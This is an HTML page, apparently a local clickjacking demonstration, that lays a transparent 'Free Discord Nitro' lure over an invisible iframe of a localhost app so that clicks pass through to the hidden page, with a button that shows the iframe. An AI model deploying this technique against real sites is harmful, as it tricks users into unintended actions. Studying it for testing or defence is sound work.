<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Attacker Site - Clickjacking Demo</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            position: relative;
            height: 100vh;
            overflow: hidden;
        }
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
            z-index: 1;
            opacity: 0; /* Initially hidden */
        }
        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 2;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            background: transparent; /* Fully transparent */
        }
        .fake-button {
            padding: 10px 20px;
            font-size: 16px;
            background-color: #FF5722;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            pointer-events: none; /* allows clicks to go through to iframe */
        }
        .toggle-button {
            position: absolute;
            top: 10px;
            left: 10px;
            padding: 5px 10px;
            font-size: 14px;
            background-color: #2196F3;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            z-index: 3;
        }
    </style>
</head>
<body>
    <iframe src="http://localhost:5000"></iframe>
    <div class="overlay" style="pointer-events: none;">
        <img src="/static/image.png" alt="Free Discord Nitro" style="z-index: 2; padding-top: 10px; width: 400px; height: auto; margin-bottom: 20px; pointer-events: none;">
    </div>
    <button class="toggle-button" onclick="toggleIframe()">Toggle Iframe Visibility</button>

    <script>
        function toggleIframe() {
            const iframe = document.querySelector('iframe');
            iframe.style.opacity = iframe.style.opacity === '0' ? '0.75' : '0';
        }
    </script>
</body>
</html>